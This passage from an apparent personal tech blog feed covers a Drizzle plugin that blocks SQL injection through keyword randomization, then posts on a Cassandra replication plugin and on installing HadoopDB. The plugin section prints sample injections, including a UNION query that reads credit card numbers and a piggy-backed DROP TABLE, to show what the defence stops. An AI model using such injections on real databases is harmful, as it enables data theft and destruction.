In this case, the query would not be de-randomized correctly. The STAD plugin would see that the OR keyword has not been randomized with the correct randomization key. Thus, the plugin would detect spurious input and never issue this query against the database.
&lt;/p&gt;

&lt;h3&gt;UNION Query&lt;/h3&gt;

&lt;p&gt;
In union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query.
&lt;/p&gt;

&lt;p&gt;
The goals of this attack type are:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;bypass authentication&lt;/li&gt;
  &lt;li&gt;extract data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
With this attack, an attacker can trick the application into returning data from a table different than the one intended by the developer. 
&lt;/p&gt;

&lt;p&gt;
For example, assume there is another table named creditcards in the same schema as the users table. In that case, an attacker could construct a query like:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND pass = '' AND pin=
&lt;/pre&gt;

&lt;p&gt;
The original query returns an empty set but the second query returns data from the creditcards table if the given account number exists. The result of this depends on the application but it is possible an attacker could exploit this.
&lt;/p&gt;

&lt;p&gt;
With our plugin, this query would look like:
&lt;/p&gt;

&lt;pre&gt;
SELECT1234 accounts FROM1234 users WHERE1234 login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND1234 pass = '' AND1234 pin=
&lt;/pre&gt;

&lt;p&gt;
As in the tautology attack, this query would never be issued since not all keywords in the query have been randomized with the correct randomization key.
&lt;/p&gt;

&lt;h3&gt;Piggy-Backed Queries&lt;/h3&gt;

&lt;p&gt;
Here, an attacker attempts to inject additional queries into the original query. In this case, an attacker is not trying to modify the original query; instead they are attempting to include new and distinct queries that &quot;piggy-back&quot; on the original query (think &lt;a href=&quot;http://xkcd.com/327/&quot;&gt;little-bobby tables&lt;/a&gt;).
&lt;/p&gt;

&lt;p&gt;
The goals of this attack type are:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;extract data&lt;/li&gt;
  &lt;li&gt;add or modify data&lt;/li&gt;
  &lt;li&gt;perform denial of service&lt;/li&gt;
  &lt;li&gt;execute remote commands&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
The database will receive multiple queries when an attack of this type is launched. If successful, an attacker could insert virtually any type of SQL command into the additional queries issued after the original query.
&lt;/p&gt;

&lt;p&gt;
An example of this attack would be:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login = 'bob' AND pass = ''; DROP TABLE users; -- ' AND pin = 1941;
&lt;/pre&gt;

&lt;p&gt;
The above attack has the DROP TABLE statement piggy-backed onto the original query; it would drop the users table. Our approach prevents this attack in a similar way to the previous 2 attack types. The injected commands would not have been randomized with the correct randomization key and so would be rejected by our plugin. In this case, the first query would be issued but the DROP TABLE statement would never be executed.
&lt;/p&gt;

&lt;h2&gt;Overheads of Our Approach&lt;/h2&gt;

&lt;p&gt;
One question that pops up with a plugin like this is what kind of overhead is associated with it. To measure the overhead of the plugin, I ran the oltp test in sysbench at various concurrency levels with the plugin both enabled and disabled (a sketch of the invocation follows the discussion below). The results for this experiment are shown below:
&lt;/p&gt;

&lt;img src=&quot;../../../images/sysbench_raw_numbers.png&quot; /&gt;

&lt;p&gt;
It's worth noting that this experiment was run on my local laptop, so the actual transactions per second numbers are not interesting. All I'm looking for is the dip in transactions per second when the plugin is enabled. We can see that there is definitely a hit taken when the plugin is enabled, with the reduction in transactions per second being about 10% across the board.
&lt;/p&gt;
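<p>
</p>
&lt;p&gt;
For reference, the sysbench runs were along the lines of the sketch below. This assumes a sysbench build that can talk to drizzle; the table size and request counts here are illustrative rather than the exact values I used:
&lt;/p&gt;

&lt;pre&gt;
# populate the test table, then run the oltp test at a given concurrency
sysbench --test=oltp --oltp-table-size=1000000 prepare
sysbench --test=oltp --num-threads=16 --max-requests=10000 run
&lt;/pre&gt;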

&lt;h2&gt;Installation and Usage&lt;/h2&gt;

&lt;p&gt;
The &lt;a href=&quot;http://github.com/posulliv/stad&quot;&gt;STAD plugin&lt;/a&gt; is maintained on github as a purely out-of-tree drizzle plugin. To download the source, either git or wget can be used:
&lt;/p&gt;

&lt;pre&gt;
wget https://github.com/posulliv/stad/tarball/master
git clone git://github.com/posulliv/stad.git
&lt;/pre&gt;

&lt;p&gt;
To build and install the plugin, the following is performed:
&lt;/p&gt;

&lt;pre&gt;
./config/autorun.sh
./configure --includedir=/path/to/drizzle/root/include --with-libdrizzle-prefix=/path/to/drizzle/root --prefix=/path/to/drizzle/root
make
make install
&lt;/pre&gt;

&lt;p&gt;
The above assumes you have drizzle installed somewhere on your system. You just need to point the configure script to that location so it can find the header files it needs.
&lt;/p&gt;

&lt;p&gt;
When starting the drizzled daemon, we need to inform it about the new plugin that we want to load since the plugin is not loaded by default. The extra parameter to pass to drizzled is --plugin-add (this loads the default list of plugins in addition to any plugins given as a parameter) so my drizzled command in my startup script looks like:
&lt;/p&gt;

&lt;pre&gt;
start_daemon -p &quot;$PIDFILE&quot; &quot;$DAEMON --chuid $DRIZZLE_USER&quot;  &quot;--datadir=$DATADIR&quot; &quot;--plugin-add=stad&quot;&gt; $LOG 2&gt;&amp;1 &amp;
&lt;/pre&gt;

&lt;p&gt;
To verify the plugin is loaded correctly, we can query the MODULES table in the DATA_DICTIONARY schema:
&lt;/p&gt;

&lt;pre&gt;
drizzle&gt; select module_author, module_license, module_version
    -&gt; from data_dictionary.modules
    -&gt; where module_name = 'stad';
+----------------------+----------------+----------------+
| module_author        | module_license | module_version |
+----------------------+----------------+----------------+
| &quot;Padraig O Sullivan&quot; | GPL            | &quot;0.2&quot;          | 
+----------------------+----------------+----------------+
1 row in set (0 sec)

drizzle&gt; 
&lt;/pre&gt;

&lt;p&gt;
Once the plugin is installed, we can use a ruby client for drizzle that I've been working on in my spare time. This &lt;a href=&quot;http://github.com/posulliv/drizzle-ruby&quot;&gt;ruby client&lt;/a&gt; is on github as well and can either be retrieved using git or pulled as a tarball:
&lt;/p&gt;

&lt;pre&gt;
wget https://github.com/posulliv/drizzle-ruby/tarball/master
git clone git://github.com/posulliv/drizzle-ruby.git
&lt;/pre&gt;

&lt;p&gt;
Then, installing the client is simply:
&lt;/p&gt;

&lt;pre&gt;
sudo rake install
&lt;/pre&gt;

&lt;p&gt;
Once the ruby client is installed, we can begin to use it in an application. A simple example of using it is:
&lt;/p&gt;

&lt;script src=&quot;http://gist.github.com/717571.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
The above does nothing useful but highlights a few interesting points. The client decides whether or not to use SQL randomization for a query based on the connection options given when creating a new connection to the database. Creating the connection object in the example above corresponds directly to steps (1) and (2) in the overview diagram at the beginning of this article.
&lt;/p&gt;

&lt;p&gt;
To issue a query that will be randomized, we must first specify a randomization key to the STAD plugin. Right now, this is done using a global variable, so anyone who can connect to your drizzle database and view global variables can see what randomization key is being used. To set the randomization key to '1234', it's simply:
&lt;/p&gt;

&lt;pre&gt;
drizzle&gt; set global stad_key = '1234';
Query OK, 0 rows affected (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;p&gt;
After setting the randomization key, every query issued against the database will now need to be randomized. This obviously becomes a problem if you need to issue queries through the command line client! The solution I use for now is to provide a version of the drizzle CLI named stadclient that takes the randomization key as a parameter. This binary is installed in the bin directory under your drizzle root when you install the STAD plugin. We invoke it and can issue regular queries through the CLI again:
&lt;/p&gt;

&lt;pre&gt;
$ stadclient -k 1234

drizzle&gt; select * from data_dictionary.global_variables where variable_name = 'stad_key'; 
+---------------+----------------+
| VARIABLE_NAME | VARIABLE_VALUE |
+---------------+----------------+
| stad_key      | 1234           | 
+---------------+----------------+
1 row in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;p&gt;
Getting back to the ruby client, queries are issued against drizzle and randomized automatically by the ruby client. The code to issue a query against the server is:
&lt;/p&gt;

&lt;script src=&quot;http://gist.github.com/727914.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
Line 11 in the above code encapsulates steps (3) through (7) in the overview diagram at the beginning of this article. Line 12 actually returns the results to the application and corresponds to step (8) in the diagram.
&lt;/p&gt;

&lt;h2&gt;Conclusions&lt;/h2&gt;

&lt;p&gt;
STAD is a practical protection mechanism against SQL injection attacks. It has relatively low overheads and when used through the ruby client interface I developed, it becomes quite simple to use in a client application with minimal modification. Of course, SQL injection attacks are completely preventable using good programming practices but I believe this plugin provides an extra layer of security in environments where a DBA cannot control how a developer chooses to sanitize their input.
&lt;/p&gt;
</content>
 </entry>
 
 <entry>
   <title>Drupal 7 with Drizzle</title>
   <link href="http://posulliv.github.com/2010/07/12/drizzle-drupal"/>
   <updated>2010-07-12T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/07/12/drizzle-drupal</id>
   <content type="html">I wrote an &lt;a href=&quot;http://akiban.com/blog/2010/07/12/running-drupal-7-with-drizzle/&quot;&gt;article&lt;/a&gt; on the company
blog today about how to configure the latest Drupal 7 alpha release to work with Drizzle as the backend database.
&lt;br&gt;&lt;br&gt;

Feel free to check it out if you are interested.

</content>
 </entry>
 
 <entry>
   <title>Simple Drizzle Replication Plugin for Cassandra</title>
   <link href="http://posulliv.github.com/2010/06/01/replication-plugins"/>
   <updated>2010-06-01T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/06/01/replication-plugins</id>
   <content type="html">This week, I'm giving a talk at &lt;a href=&quot;http://opensourcebridge.org&quot;&gt;Open Source Bridge&lt;/a&gt; in Portland on 
developing replication plugins for Drizzle. This talk will be based on the &lt;a href=&quot;&quot;&gt;tutorial&lt;/a&gt; that
&lt;a href=&quot;http://joinfu.com&quot;&gt;Jay&lt;/a&gt; and I gave at the MySQL User's Conference this year. What I want to
cover in this article is the process of creating a simple replication plugin that simply applies the 
replication events that occur in Drizzle to &lt;a href=&quot;http://cassandra.apache.org/&quot;&gt;Cassandra&lt;/a&gt;.
&lt;br&gt;

Lots of the material in this article is directly due to input from Jay and in particular from
the &lt;a href=&quot;http://joinfu.com/presentations/drizzle-replication-plugins/drizzle-replication-plugins.pdf/&quot;&gt;presentation&lt;/a&gt; 
Jay put together for our tutorial in April.
&lt;br&gt;

&lt;h2&gt;Drizzle Architecture &amp; Replication Basics&lt;/h2&gt;

As is pretty well known at this stage, Drizzle follows a micro-kernel design. Essentially, this means that
most features are built as plugins. For example, in Drizzle, authentication, logging, storage engines, etc.
are provided as plugins. The kernel is meant to be extremely small in size and provides the basic 
functionality a database server requires such as a parser, query optimizer, and query executor.
&lt;br&gt;

Replication in Drizzle is entirely row-based, with the kernel acting as the marshal of all sources and targets of
replicated data. The kernel constructs objects that represent changes made in the server. The objects
constructed are of type &lt;code&gt;message::Transaction&lt;/code&gt; and the kernel pushes these constructed objects
out to replication streams (a replication stream in Drizzle is a pairing of a replicator and an
applier).
&lt;br&gt;

The Transaction message in Drizzle is the basic unit of work in the replication system which represents a
set of changes that were made. We use &lt;a href=&quot;http://code.google.com/p/protobuf/&quot;&gt;Google Protocol
Buffers&lt;/a&gt; for representing these messages. The GPB definition for the Transaction message is contained
within the &lt;code&gt;drizzled/message/transaction.proto&lt;/code&gt; file within the Drizzle source tree. Jay has
&lt;a href=&quot;http://www.joinfu.com/2009/10/drizzle-replication-changes-in-api-to-support-group-commit/&quot;&gt;
previously&lt;/a&gt; gone into great detail on the GPB message definitions and I see no point in duplicating the
great articles Jay has written so I encourage you to read those if you are interested in knowing more about
the GPB message definitions.

&lt;h2&gt;Creating a Simple Cassandra Applier&lt;/h2&gt;

Mainly, what I wanted to do in this article is go through a simple example to demonstrate the replication
API. Please note that the plugin I'm going to cover in this example is extremely simple and probably
not very useful. Its main purpose is to serve as an example of how to develop a transaction applier plugin
that can apply transactions to a different database system; in this case Cassandra.
&lt;br&gt;

Our Cassandra applier depends on 2 third-party libraries: 1) &lt;a href=&quot;http://incubator.apache.org/thrift&quot;&gt;
thrift&lt;/a&gt; and 2) &lt;a href=&quot;http://github.com/posulliv/libcassandra&quot;&gt;libcassandra&lt;/a&gt;. libcassandra is
a C++ wrapper for the thrift interface to Cassandra that I developed a few months ago to make it easier
for me to play with Cassandra when programming in C++. It's not very well tested but suits my purposes just
fine.
&lt;br&gt;

Given that our plugin depends on some third-party libraries, my &lt;code&gt;plugin.ini&lt;/code&gt; file will look like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420592.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

And my &lt;code&gt;plugin.ac&lt;/code&gt; file will look like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420594.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

This takes care of my plugin's dependence on third-party libraries during the compilation process. If these
libraries are not present on the system when I compile Drizzle, then this plugin will not be compiled. 
&lt;br&gt;

As mentioned before, the plugin I am developing is a transaction applier. This means the plugin will be
implementing the &lt;code&gt;plugin::TransactionApplier&lt;/code&gt; interface. The main function a plugin implementing
this interface needs to provide is the &lt;code&gt;apply()&lt;/code&gt; function.

The CassandraApplier class is declared in a new header file named &lt;code&gt;cassandra_applier.h&lt;/code&gt;;
the class declaration looks like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420596.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The implementation is contained within the &lt;code&gt;cassandra_applier.cc&lt;/code&gt; C++ file. The most interesting function in
this file is the plugin's implementation of the &lt;code&gt;apply()&lt;/code&gt; function. In the case of the 
CassandraApplier, this function looks like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420597.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

One thing worth mentioning about the above function before delving into its details is that we assume
there is one keyspace within Cassandra that we will be replicating into. If this keyspace is not present,
the function will fail. This assumption simply allowed me to develop the plugin quickly; there is no
other reason for it. A more robust plugin would make the keyspace configurable. Personally, I would
prefer a way to specify the keyspace a statement should be replicated into within the SQL statement
itself, so it could be controlled on a per-statement basis. Not a major issue, but I wanted to point
it out in case anyone was wondering.
&lt;br&gt;

Now, the above function first looks at the Transaction message and determines how many Statement messages
are contained within it. Next, we loop through all the Statement messages contained within the Transaction
message. Depending on the type of the Statement message, we perform a different action. Right now, the 
plugin only cares about 3 types of Statements: INSERT, UPDATE, and DELETE.
&lt;br&gt;

However, the action performed for each type is virtually identical. First, the header for that type is
obtained. Next, the table metadata and the actual data for the Statement are obtained. We then loop through
each field affected by the Statement.
&lt;br&gt;

For example, with an INSERT Statement, we loop through each
field affected by the INSERT and obtain the field metadata for that field. We use this to obtain the key
that will be used for insertion in Cassandra. For this simple plugin, the key used by Cassandra is the
primary key of the table. The name of the field is used as a column name in Cassandra and the value being
inserted for that field is used as the value for that column. The name of the table on which the INSERT
is happening corresponds to a column family name in Cassandra.
&lt;br&gt;

The initialization function for this plugin is pretty straightforward. We allocate memory for a
CassandraApplier object and add that object to the plugin registry.

All the files referenced above are placed in a directory named cassandra_applier that I created in the plugin
directory of the &lt;code&gt;lp:~posulliv/drizzle/rep-cassandra&lt;/code&gt; branch on &lt;a href=&quot;http://launchpad.net/drizzle&quot;&gt;
Launchpad&lt;/a&gt;. To download and compile the plugin, perform the following:

&lt;pre&gt;
bzr branch lp:~posulliv/drizzle/rep-cassandra
cd rep-cassandra
export CXXFLAGS=-I/usr/local/include/thrift
./config/autorun.sh
./configure --with-cassandra-applier-plugin
make
&lt;/pre&gt;

If any of the third-party libraries required by the plugin are absent, you will see a message informing you
of that during the configure stage.
&lt;br&gt;

In order to start a Drizzle server from the above branch with the appropriate plugins loaded, I perform
the following:

&lt;pre&gt;
mkdir run
cd run
../drizzled/drizzled --basedir=$PWD \
--datadir=$PWD \
--plugin_add=default_replicator,cassandra_applier \
&gt;&gt; $PWD/drizzle.err 2&gt;&amp;1
&lt;/pre&gt;

To make sure the correct replication stream is enabled within Drizzle, I can query the data dictionary
table Jay created for this purpose:

&lt;pre&gt;
drizzle&gt; select * from data_dictionary.replication_streams;
+--------------------+-------------------+
| REPLICATOR         | APPLIER           |
+--------------------+-------------------+
| default_replicator | cassandra_applier | 
+--------------------+-------------------+
1 row in set (0 sec)

drizzle&gt; 
&lt;/pre&gt;

Next I'll start up my Cassandra cluster that the applier plugin will work with.

For reference, I'm using Cassandra 0.7 and the Cassandra cluster I used for this article is configured as follows (the 
&lt;code&gt;cassandra.yaml&lt;/code&gt; file):

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420601.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
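Starting a single node from a 0.7 tarball install is then roughly (a sketch; the directory name depends on the
exact 0.7 release you downloaded, and -f keeps the process in the foreground):

&lt;pre&gt;
cd apache-cassandra-0.7.0
./bin/cassandra -f
&lt;/pre&gt;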

Now, to see the plugin in action, consider the following table in Drizzle:

&lt;pre&gt;
drizzle&gt; create table padraig
    -&gt; (
    -&gt;   a int,
    -&gt;   b varchar(128),
    -&gt;   c varchar(128),
    -&gt;   primary key(a)
    -&gt; );
Query OK, 0 rows affected (0.07 sec)

drizzle&gt; 
&lt;/pre&gt;

And assume we perform the following INSERT statements on the table:

&lt;pre&gt;
drizzle&gt; insert into padraig (a, b) values (1, 'sarah');
Query OK, 1 row affected (0.16 sec)

drizzle&gt; insert into padraig (a, c) values (2, 'nimbus');
Query OK, 1 row affected (0.15 sec)

drizzle&gt; insert into padraig (a, b, c) values (3, 'domhnall', 'tomas');
Query OK, 1 row affected (0.15 sec)

drizzle&gt; 
&lt;/pre&gt;

Now, to see what was inserted in Cassandra, we will use the Cassandra CLI interface:

&lt;pre&gt;
$ ./bin/cassandra-cli 
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
[default@unknown] connect localhost/9160
Connected to: &quot;Drizzle Example Cluster&quot; on localhost/9160
[default@unknown] use drizzle;
Authenticated to keyspace: drizzle
[default@drizzle] get padraig['1']
=&gt; (column=61, value=sarah, timestamp=1275376031524000)
Returned 1 results.
[default@drizzle] get padraig['2'] 
=&gt; (column=62, value=nimbus, timestamp=1275376057537000)
Returned 1 results.
[default@drizzle] get padraig['3']                  
=&gt; (column=62, value=domhnall, timestamp=1275376211981000)
=&gt; (column=61, value=tomas, timestamp=1275376067097000)
Returned 2 results.
[default@drizzle] quit
$
&lt;/pre&gt;

&lt;br&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;

That's about it for this article on Drizzle replication. If interested in more, feel free to ping the Drizzle
mailing list with questions or comments. Parts of replication are still under active development and I know
Jay loves to get feedback from people on the replication API in Drizzle.
</content>
 </entry>
 
 <entry>
   <title>Up and Running with HadoopDB</title>
   <link href="http://posulliv.github.com/2010/05/10/hadoopdb-mysql"/>
   <updated>2010-05-10T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/05/10/hadoopdb-mysql</id>
   <content type="html">&lt;a href=&quot;http://db.cs.yale.edu/hadoopdb/hadoopdb.html&quot;&gt;HadoopDB&lt;/a&gt; is an interesting project going
on at Yale under the &lt;a href=&quot;http://dbmsmusings.blogspot.com/&quot;&gt;Prof. Daniel Abadi's&lt;/a&gt; supervision
that I've been meaning to play with for some time now. I initially read the &lt;a
href=&quot;http://db.cs.yale.edu/hadoopdb/hadoopdb.pdf&quot;&gt;paper&lt;/a&gt; describing HadoopDB last year and
intended to document how to setup a HadoopDB system using MySQL but I got busy with school work and
never got around to it. Since I have a little more free time now that I've finished my thesis, I
figured it was about time I got down to playing around with HadoopDB and describing how to setup a
HadoopDB system using MySQL as the single node database. With that, I'm going to describe how to get
up and running with HadoopDB. If you have not read the paper before starting, I strongly encourage
you to give it a read. Its very well written and not that difficult to get through.
&lt;br&gt;

In this guide, I'm installing on Ubuntu Server 10.04 64-bit. Thus, I will be using the Ubuntu
package manager heavily. I have not tested on other platforms but a lot of what is described here
should apply to other platforms such as CentOS.
&lt;br&gt;

This guide only covers setting up a single-node system. It would not be difficult to extend what
is contained here to a multi-node system, which I may write about in the future.

&lt;h2&gt;Installing Hadoop&lt;/h2&gt;

Before installing Hadoop, Java needs to be installed. As of 10.04, the Sun JDK packages have been
&lt;a
href=&quot;http://www.ubuntu.com/getubuntu/releasenotes/1004#Sun%20Java%20moved%20to%20the%20Partner%20repository&quot;&gt;dropped&lt;/a&gt; from the Multiverse section of the Ubuntu archive. You can still install the Sun JDK if you
wish but for this article, I used OpenJDK without issues:

&lt;pre&gt;
sudo apt-get install openjdk-6-jdk
&lt;/pre&gt;

Before getting into the installation of Hadoop, I encourage you to read Michael Noll's in-depth
&lt;a
href=&quot;http://www.michael-noll.com/wiki/Running_Hadoop_On_Ubuntu_Linux_(Single-Node_Cluster)&quot;&gt;guide&lt;/a&gt;
to installing Hadoop on Ubuntu. I borrow from his articles a lot here.
&lt;br&gt;

First, create a user account and group that Hadoop will run as:

&lt;pre&gt;
sudo groupadd hadoop
sudo useradd -m -g hadoop -d /home/hadoop -s /bin/bash -c &quot;Hadoop software owner&quot; hadoop
&lt;/pre&gt;

Next, we &lt;a href=&quot;http://www.apache.org/dyn/closer.cgi/hadoop/core&quot;&gt;download&lt;/a&gt; Hadoop and create
directories for storing the software and data. For this article, Hadoop 0.20.2 was used:

&lt;pre&gt;
cd /opt
sudo wget http://www.gtlib.gatech.edu/pub/apache/hadoop/core/hadoop-0.20.2/hadoop-0.20.2.tar.gz
sudo tar zxvf hadoop-0.20.2.tar.gz
sudo ln -s /opt/hadoop-0.20.2 /opt/hadoop
sudo chown -R hadoop:hadoop /opt/hadoop /opt/hadoop-0.20.2
sudo mkdir -p /opt/hadoop-data/tmp-base
sudo chown -R hadoop:hadoop /opt/hadoop-data/
&lt;/pre&gt;

Alternatively, Cloudera has created &lt;a href=&quot;http://www.cloudera.com/hadoop-deb&quot;&gt;Deb packages&lt;/a&gt;
that can be used if you wish. I have not used them before so can't comment on how they work.
&lt;br&gt;

Next, we need to configure SSH for the hadoop user. This is required by Hadoop in order to manage
any nodes.

&lt;pre&gt;
su - hadoop
ssh-keygen -t rsa
cat $HOME/.ssh/id_rsa.pub &gt;&gt; $HOME/.ssh/authorized_keys
&lt;/pre&gt;

When the ssh-keygen command is run, be sure to leave the passphrase blank so that you will not be
prompted for a password.
&lt;br&gt;
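A quick way to confirm that passwordless SSH works (and to accept the host key for localhost on the
first connection) is simply:

&lt;pre&gt;
# still as the hadoop user
ssh localhost
exit
&lt;/pre&gt;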

We will want to update the .bashrc file for the hadoop user with appropriate environment variables
to make administration easier:
&lt;script src=&quot;http://gist.github.com/394768.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

We will cover installing Hive later in this article but for now, leave that environment variable in
there. For the remainder of this article, I will be referring to various locations such as the
Hadoop installation directory using the environment variables defined above.

Next, we want to configure Hadoop. There are 3 configuration files in Hadoop that we need to modify:

&lt;ul&gt;
  &lt;li&gt;$HADOOP_CONF/core-site.xml&lt;/li&gt;
  &lt;li&gt;$HADOOP_CONF/mapred-site.xml&lt;/li&gt;
  &lt;li&gt;$HADOOP_CONF/hdfs-site.xml&lt;/li&gt;
&lt;/ul&gt;

Based on the directory structure I created beforehand, these 3 files looked as follows for me:

&lt;script src=&quot;http://gist.github.com/394770.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Notice the reference to the HadoopDB XML file. We will cover that later, but that property must be
present in your configuration in order to use HadoopDB.
&lt;br&gt;
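
For reference, the HadoopDB-specific property in core-site.xml looks roughly like the following
(the property name here is an assumption from my reading of the HadoopDB code and documentation,
so double-check it against the release you download):

&lt;pre&gt;
&lt;!-- assumed property name; verify against your hadoopdb.jar --&gt;
&lt;property&gt;
  &lt;name&gt;hadoopdb.config.file&lt;/name&gt;
  &lt;value&gt;HadoopDB.xml&lt;/value&gt;
&lt;/property&gt;
&lt;/pre&gt;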

Next, we need to modify the $HADOOP_CONF/hadoop-env.sh file so that the JAVA_HOME variable is
correctly set in that file. Thus, I have the following 2 lines in my hadoop-env.sh file:

&lt;pre&gt;
# The java implementation to use.  Required.
export JAVA_HOME=/usr/lib/jvm/java-6-openjdk
&lt;/pre&gt;

Next, we need to format the Hadoop filesystem:

&lt;pre&gt;
$ hadoop namenode -format
10/05/07 14:24:12 INFO namenode.NameNode: STARTUP_MSG: 
/************************************************************
STARTUP_MSG: Starting NameNode
STARTUP_MSG:   host = hadoop1/127.0.1.1
STARTUP_MSG:   args = [-format]
STARTUP_MSG:   version = 0.20.2
STARTUP_MSG:   build = https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.20 -r
911707; compiled by 'chrisdo' on Fri Feb 19 08:07:34 UTC 2010
************************************************************/
10/05/07 14:24:12 INFO namenode.FSNamesystem: fsOwner=hadoop,hadoop
10/05/07 14:24:12 INFO namenode.FSNamesystem: supergroup=supergroup
10/05/07 14:24:12 INFO namenode.FSNamesystem: isPermissionEnabled=true
10/05/07 14:24:12 INFO common.Storage: Image file of size 96 saved in 0 seconds.
10/05/07 14:24:12 INFO common.Storage: Storage directory /opt/hadoop-data/tmp-base/dfs/name has been
successfully formatted.
10/05/07 14:24:12 INFO namenode.NameNode: SHUTDOWN_MSG: 
/************************************************************
SHUTDOWN_MSG: Shutting down NameNode at hadoop1/127.0.1.1
************************************************************/
$
&lt;/pre&gt;

The above is the output from a successful format. Now, we can finally start our single-node Hadoop
installation:

&lt;pre&gt;
$ start-all.sh
starting namenode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-namenode-hadoop1.out
localhost: starting datanode, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-datanode-hadoop1.out
localhost: starting secondarynamenode, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-secondarynamenode-hadoop1.out
starting jobtracker, logging to /opt/hadoop/bin/../logs/hadoop-hadoop-jobtracker-hadoop1.out
localhost: starting tasktracker, logging to
/opt/hadoop/bin/../logs/hadoop-hadoop-tasktracker-hadoop1.out
$
&lt;/pre&gt;

Again, if you don't see output similar to the above, something went wrong. The log files under
/opt/hadoop/logs are quite helpful for troubleshooting.
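
A quick sanity check that all five daemons actually came up is the JDK's jps tool (the PIDs below
are illustrative):

&lt;pre&gt;
$ jps
2287 NameNode
2422 DataNode
2556 SecondaryNameNode
2638 JobTracker
2771 TaskTracker
2890 Jps
&lt;/pre&gt;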

&lt;h2&gt;Installing MySQL&lt;/h2&gt;

Installing MySQL is quite simple on Ubuntu. I went with the MySQL Server package:

&lt;pre&gt;
sudo apt-get install mysql-server
&lt;/pre&gt;

We don't need to perform any special configuration of MySQL for HadoopDB. Just make sure to take
note of the password you specify for the root user since we will perform all work with HadoopDB as
the root user (this is not mandatory, but it keeps things simple).
&lt;br&gt;

Next, we need to install the MySQL JDBC driver. For this article, I used &lt;a
href=&quot;http://www.mysql.com/downloads/connector/j/&quot;&gt;Connector/J&lt;/a&gt;. After downloading the jar file,
we need to copy it into Hadoop's lib directory so it has access to it:

&lt;pre&gt;
cp mysql-connector-java-5.1.12-bin.jar $HADOOP_HOME/lib
&lt;/pre&gt;

It's worth noting that in the paper, the authors say they initially used MySQL with HadoopDB
but switched to PostgreSQL. The main reason cited is the poor join algorithms in MySQL, which
I take to mean the fact that only nested-loop join is supported in MySQL. I don't attempt to make
any comparison of HadoopDB running with MySQL versus PostgreSQL, but I wanted to point out the
authors' observation.

&lt;h2&gt;Download HadoopDB&lt;/h2&gt;

Now we can &lt;a href=&quot;http://sourceforge.net/projects/hadoopdb/files/&quot;&gt;download&lt;/a&gt; HadoopDB. I'm
going to download both the jar file and check out the source from Subversion. After downloading the
jar file, we need to copy it into Hadoop's lib directory so it has access to it:

&lt;pre&gt;
cp hadoopdb.jar $HADOOP_HOME/lib
&lt;/pre&gt;

I also checked out the source code from Subversion in case I needed to re-build the jar file at any
time:

&lt;pre&gt;
svn co https://hadoopdb.svn.sourceforge.net/svnroot/hadoopdb hadoopdb
&lt;/pre&gt;

&lt;h2&gt;Install Hive&lt;/h2&gt;

&lt;a href=&quot;http://wiki.apache.org/hadoop/Hive&quot;&gt;Hive&lt;/a&gt; is used by HadoopDB as a SQL interface to
their system. It's not a requirement for working with HadoopDB, but it is another way to interact with
HadoopDB, so I'll cover how to install it.
&lt;br&gt;

First, we need to create directories in HDFS:

&lt;pre&gt;
hadoop fs -mkdir /tmp
hadoop fs -mkdir /user/hive/warehouse
hadoop fs -chmod g+w /tmp
hadoop fs -chmod g+w /user/hive/warehouse
&lt;/pre&gt;

Next, we need to &lt;a href=&quot;http://sourceforge.net/projects/hadoopdb/files/&quot;&gt;download&lt;/a&gt; the
SMS_dist tar file from the HadoopDB download page:

&lt;pre&gt;
tar zxvf SMS_dist.tar.gz
sudo mv dist /opt/hive
sudo chown -R hadoop:hadoop /opt/hive
&lt;/pre&gt;

Since we already set up the environment variables related to Hive earlier when we were installing
Hadoop, everything we need should now be in our path:

&lt;pre&gt;
$ hive
Hive history file=/tmp/hadoop/hive_job_log_hadoop_201005081717_1990651345.txt
hive&gt; 

create     describe   exit       from       load       quit       set
hive&gt; quit;
$
&lt;/pre&gt;

&lt;h2&gt;Data&lt;/h2&gt;

We want some data to play around with for testing purposes. For this article, I'm going to use
the data from the &lt;a href=&quot;http://database.cs.brown.edu/projects/mapreduce-vs-dbms/&quot;&gt;paper&lt;/a&gt;
published last summer: 'A Comparison of Approaches to Large-Scale Data Analysis'. Documentation on
how to reproduce the benchmarks in that paper is provided at the link above. For
this article, since I'm only running one Hadoop node and have absolutely no interest in generating
lots of data, I modified the scripts provided to produce tiny amounts of data:

&lt;pre&gt;
svn co http://graffiti.cs.brown.edu/svn/benchmarks/
cd benchmarks/datagen/teragen
&lt;/pre&gt;

Within the benchmarks/datagen/teragen folder, there is a Perl script named teragen.pl that is
responsible for generating the data. I modified that script for my purposes to look like:

&lt;script src=&quot;http://gist.github.com/394790.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

We then run the above Perl script to generate data that will be loaded into HDFS. HadoopDB comes
